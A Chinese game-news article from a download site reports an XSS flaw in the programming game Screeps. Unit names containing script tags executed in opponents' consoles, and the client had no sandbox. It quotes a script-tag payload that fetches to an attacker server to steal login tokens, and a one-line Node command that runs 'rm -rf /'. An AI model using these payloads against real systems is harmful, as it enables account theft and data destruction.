芦苇下载站:值得大家信赖的游戏下载站!
发布时间:2026-01-26 11:25:52来源:芦苇下载站作者:
你是否曾抱怨游戏里的AI太笨?Steam特别好评的独立游戏《Screeps》给了所有自认聪明的玩家一个“机会”:这游戏的单位根本没有AI,每一行行动指令都得你自己用Javascript写。
这本该是程序员的终极乐园,但最近一则爆料却让这款硬核作品变成了木马的温床。
在《Screeps》的联机世界中,玩家通过控制台查看单位日志。然而开发者为了省事,竟让控制台直接解析HTML。这意味着,如果你给自己的士兵起名叫<script>fetch(攻击者服务器...)</script>,只要对手在控制台查看了你的单位名称,你的恶意脚本就能瞬间窃取对方的登录Token。

更恐怖的是,该游戏的Steam原生客户端完全没有沙箱保护。黑客只需一行代码:nw.require('child_process').exec('rm -rf /'),就能获得受害者电脑的最高命令行权限,直接删库跑路。
面对这种史诗级安全漏洞,开发者的反应简直令人窒息。他们在GitHub上冷冷地回应:“我们不认为这是严重的威胁。”甚至辩称,如果玩家因为运行了不理解的代码而被黑,那是玩家自己的错,就像你自己把毒药吃下去一样。
直到这则爆料在社交平台X上疯传,开发者才在几小时内火速上线了补丁,却依然在官推和邮件中坚称“这从来都不是漏洞”,甚至指责爆料者是在“恶意诽谤”和“骗点击”。
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。下一篇:返回列表
软糖射手2上线时间 软糖射手2正式发布日期与平台信息
生存33天厨神怎么样|生存33天厨神玩法解析与角色强度评测
逆战未来陷阱怎么解锁 逆战未来陷阱详细解锁步骤与条件说明
逆战未来生命公司搭配指南 逆战未来生命公司最强阵容与实战技巧
逆战未来沙丘之怒怎么获得 逆战未来沙丘之怒获取方式全攻略
三角洲行动今日密码12.28 12月28日密码门摩斯密码分享
龙魂旅人中期阵容推荐 龙魂旅人高性价比过渡阵容与角色搭配指南
动作游戏《装甲核心 移动版3》PC版于1月21日在全球发售
合作动作冒险游戏《DuneCrawl》登陆Steam 发售日待定